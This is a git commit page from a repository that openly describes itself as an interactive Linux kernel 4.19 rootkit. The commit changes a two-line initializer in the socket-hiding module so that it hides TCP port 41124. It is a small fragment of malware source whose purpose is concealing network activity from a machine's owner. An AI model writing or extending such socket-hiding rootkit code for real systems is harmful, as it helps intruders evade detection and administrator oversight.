linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit a781ade1bb5c93c9fbc2d846c7e73228a5438b6f
parent d73614b7791805dc2656a3ee98e0f30b04e075f6
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 13 Dec 2020 00:16:07 +0100

Finalize sockhide backbone

Diffstat:
Msrc/sockhide.c | 4++--
1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/sockhide.c b/src/sockhide.c @@ -8,8 +8,8 @@ #include "sockhide.h" port_list_t hidden_ports = { - .port = -1, - .proto = -1, + .port = 41124, + .proto = tcp4, .prev = NULL, .next = NULL, };